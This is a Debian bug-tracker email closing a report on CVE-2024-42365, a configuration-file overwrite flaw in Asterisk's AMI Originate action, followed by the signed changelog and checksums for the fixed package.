Your message dated Sat, 07 Sep 2024 21:04:48 +0000
with message-id <e1sn2bw-005z6c...@fasolo.debian.org>
and subject line Bug#1078574: fixed in asterisk 1:20.9.3~dfsg+~cs6.14.60671435-1
has caused the Debian Bug report #1078574,
regarding asterisk: CVE-2024-42365
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1078574: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1078574
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: asterisk
Version: 1:20.8.1~dfsg+~cs6.14.40431414-1
Severity: grave
Tags: security upstream
X-Debbugs-Cc: car...@debian.org, Debian Security Team <t...@security.debian.org>
Hi,
The following vulnerability was published for asterisk.
CVE-2024-42365[0]:
| Asterisk is an open source private branch exchange (PBX) and
| telephony toolkit. Prior to asterisk versions 18.24.2, 20.9.2, and
| 21.4.2 and certified-asterisk versions 18.9-cert11 and 20.7-cert2,
| an AMI user with `write=originate` may change all configuration
| files in the `/etc/asterisk/` directory. This occurs because they
| are able to curl remote files and write them to disk, but are also
| able to append to existing files using the `FILE` function inside
| the `SET` application. This issue may result in privilege
| escalation, remote code execution and/or blind server-side request
| forgery with arbitrary protocol. Asterisk versions 18.24.2, 20.9.2,
| and 21.4.2 and certified-asterisk versions 18.9-cert11 and
| 20.7-cert2 contain a fix for this issue.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2024-42365
https://www.cve.org/CVERecord?id=CVE-2024-42365
[1] https://github.com/asterisk/asterisk/security/advisories/GHSA-c4cg-9275-6w44
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
--- End Message ---
--- Begin Message ---
Source: asterisk
Source-Version: 1:20.9.3~dfsg+~cs6.14.60671435-1
Done: Jonas Smedegaard <d...@jones.dk>
We believe that the bug you reported is fixed in the latest version of
asterisk, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 1078...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Jonas Smedegaard <d...@jones.dk> (supplier of updated asterisk package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Sat, 07 Sep 2024 22:14:21 +0200
Source: asterisk
Architecture: source
Version: 1:20.9.3~dfsg+~cs6.14.60671435-1
Distribution: unstable
Urgency: high
Maintainer: Debian VoIP Team <pkg-voip-maintain...@lists.alioth.debian.org>
Changed-By: Jonas Smedegaard <d...@jones.dk>
Closes: 1078574
Changes:
asterisk (1:20.9.3~dfsg+~cs6.14.60671435-1) unstable; urgency=high
.
[ upstream ]
* new release(s)
+ add entries to Originate blacklist;
CVE-2024-42365;
closes: bug#1078574, thanks to Salvatore Bonaccorso
+ test for NULL ub_result in unbound_resolver_callback;
CVE-2024-42491
.
[ Jonas Smedegaard ]
* fix minor privilege escalation; thanks to Niels Galjaard
* update watch file: track mp3 component from git clone
* unfuzz patch 2012
* set urgency=high due to security-related bugfixes
Checksums-Sha1:
3fe5e9180f43555bec8ca7c5cae590a689975617 5350
asterisk_20.9.3~dfsg+~cs6.14.60671435-1.dsc
450b21cbdd4f92f333b02d202e445b443acb0b2a 11268
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xamr.tar.xz
3d0a0b6cd89a39935fd096e2ef6e79ba8302c8eb 22024
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xmp3.tar.xz
efd36da4be8883797c8ccb0ca1a41b933c1f19c9 22548
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xopus.tar.xz
cb340d770d39567f887f0a81e96d35e43360b5ed 6343840
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xpjproject.tar.xz
9c15c81d8106a5f95d1463034b155ba67c6cdccc 7362692
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig.tar.xz
45cada41712eec20574c000e06153ec8fe958ee4 136192
asterisk_20.9.3~dfsg+~cs6.14.60671435-1.debian.tar.xz
ad1772535c2e72ce90d03701f042286d02c89f1a 25080
asterisk_20.9.3~dfsg+~cs6.14.60671435-1_amd64.buildinfo
Checksums-Sha256:
768fc371867d258cbf1f2eb2978d09795ae6fb9777d6dae0b6231f0faf674756 5350
asterisk_20.9.3~dfsg+~cs6.14.60671435-1.dsc
ba0e753d9e008ad4d55c112dd0dd628fa3ce57e85f7ca5ff117fdc47e90021d8 11268
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xamr.tar.xz
a5316a4cf442be734e050d6fcd28ee23d7057d0cc546413aa75872b84e979f21 22024
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xmp3.tar.xz
1dc2659ade0eb9207a5d22df188690d1528e74374f1e0dbef4a74d824c90c9cf 22548
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xopus.tar.xz
faa3dcf960be6d0b96c21d46d2135e4cf047802bc39004b042c51fd6d41070e1 6343840
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xpjproject.tar.xz
800f6352418d13be892114d7e111034952e6c45f7d5ef31c1fc3738357fbccb5 7362692
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig.tar.xz
0049e3dc4ebe06b7e6cfba7d04d5b7b0250899b00fbee91d115acb8ae5dd0fa1 136192
asterisk_20.9.3~dfsg+~cs6.14.60671435-1.debian.tar.xz
d43ec3f4c9edfe3a8cbe9e68377217dcc0dbfd859199b8056ad9970eb0831854 25080
asterisk_20.9.3~dfsg+~cs6.14.60671435-1_amd64.buildinfo
Files:
90b2bd72589620b16c8891f2fa4268ae 5350 comm optional
asterisk_20.9.3~dfsg+~cs6.14.60671435-1.dsc
2f288da7d163b555955e1351203cb972 11268 comm optional
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xamr.tar.xz
5bdeadbbd8e5b6cc2f65a846e6859b7e 22024 comm optional
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xmp3.tar.xz
a28346e11689859feea371218e977f53 22548 comm optional
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xopus.tar.xz
d97bc16dd8abacb0bcf4b816da13573e 6343840 comm optional
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xpjproject.tar.xz
96d1fb65177e1dcce29eea9d348736bf 7362692 comm optional
asterisk_20.9.3~dfsg+~cs6.14.60671435.orig.tar.xz
7aa37871dccc0244db26197b383ed076 136192 comm optional
asterisk_20.9.3~dfsg+~cs6.14.60671435-1.debian.tar.xz
aa39013d223d893886cd1a9680e3dad9 25080 comm optional
asterisk_20.9.3~dfsg+~cs6.14.60671435-1_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQJABAEBCgAqFiEEn+Ppw2aRpp/1PMaELHwxRsGgASEFAmbcuioMHGRyQGpvbmVz
LmRrAAoJECx8MUbBoAEhiv8P/1b1IuZyMV+crokpTsB/AkuUHZYkVO43vaaCjYb8
Qx8q6oGNjobpBIkyucfNM+0KrXv79noFqvFRC87dnSmQuy196TtZH8XKA/6ZmZPT
Uvg4gWB+OPgWcPqfBlkfbdwha942t520muRl5qIzHPrEmunW0Xv7yCwLRRbacpWt
LxIiv1aEXjeOd4ZE31jLpFbH17DDLndsL7U0zeRM0rnkmXdpORnirDASKZzPLp2W
wS0pPyD9dp07vwyvldgi1xSdmOxZLOsdvZnh8/meXqdA+YPCMyU801pNuDcHMfa4
vUDe5tk/rjhfBKwWe2lEU+AycgOIYWQfuhbT4Qh49q6ZBHzsGUrUaHsVwRQRacX1
4J17jpgv9XrVX66yN3pCEoofLCzaYg+GFf6JL9Z34syvJ4YJdbILObISWRHSCOr6
dQiqqWIvJEjlM9NjX6WYO0ngv08RYHDiuyjwaKAKNf8zsY9kwP4HhLoa0UFXzv49
RjQlYvVEMFlzdJ2G62oiJSVjoUOYd0xQ8+CFS8acDjwaWYyXA3f7E7eJ8BlSQI+m
S/GArxC1/IQBvGbsRUXtPZsdUU2U2kBoz/CzFu/zWK2VttfHRHehnJaCyUslx2o3
ODfXAx+HNaTg+7+Hr7oJvc5h8MtLeiM8wRA2SvJfiyNFjineWexARahRfxCJr5wb
4bBA
=LP/8
-----END PGP SIGNATURE-----
pgpNg45wtwQDu.pgp
Description: PGP signature
--- End Message ---
